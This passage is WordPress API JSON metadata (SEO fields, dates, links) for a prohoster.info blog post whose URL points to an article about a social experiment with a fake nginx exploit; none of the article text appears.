\u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f,","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}